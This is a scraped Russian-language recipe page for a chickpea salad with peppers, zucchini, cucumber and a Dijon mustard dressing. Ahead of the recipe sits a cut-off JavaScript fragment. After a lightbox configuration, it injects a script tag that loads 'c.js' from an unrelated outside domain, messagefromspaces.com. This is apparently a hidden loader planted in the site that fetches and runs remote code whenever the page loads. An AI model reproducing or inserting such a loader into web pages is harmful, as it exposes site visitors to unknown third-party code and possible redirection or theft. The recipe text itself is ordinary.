, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Салат из нута


nutsaladНут — вещь полезная и вкусная. А если его смешать с правильными ингредиентами, получится превосходный и сытный салат. Главное — полезный!

 Чего и сколько берем:

1. Нут вареный — 1 стакан

2. Перец болгарский — 1 шт

3. Лук красный — 1 маленькая головка

4. Салат или смесь салатов

5. Свежий огурец — 2 шт

6. Кабачки — 1 шт

7. Дижонская горчица — 2 ч. ложки

8. Рисовый уксус или бальзамический

9. Оливковое масло-3/4 ст.ложки

10. Соль и перец по вкусу

 

Начинаем готовить:

Самое долгое в приготовлении этого салата — варка нута. Лучше его сварить заранее, так как данная процедура может занять 3-4 часа.

Итак, выбираем красивый салатник и начинаем туда выкладывать ингредиенты: вареный нут, мелко нарезанный лук, слегка обжаренный болгарский перец кусочками, обжаренный кабачок кусочками, мелко нарезанный огурчик, салатную смесь. Вроде ничего не забыла.

Далее, готовим заправку: размешиваем до однородности оливковое масло, дижонскую горчичку, уксус, можно остренького перца добавить и соли. Заправляем наш салат полученной  заправкой и начинаем есть. К сожалению, долго стоять он не может — листья салата начинают обмякать. Ешьте сразу! Приятного аппетита.

На эту тему вы можете почитать:

Салат из шпината с лимонно-луковой заправкой
Салат из курицы с авокадо
Табуле из Булгура

Тэги: , , ,



Добавить комментарий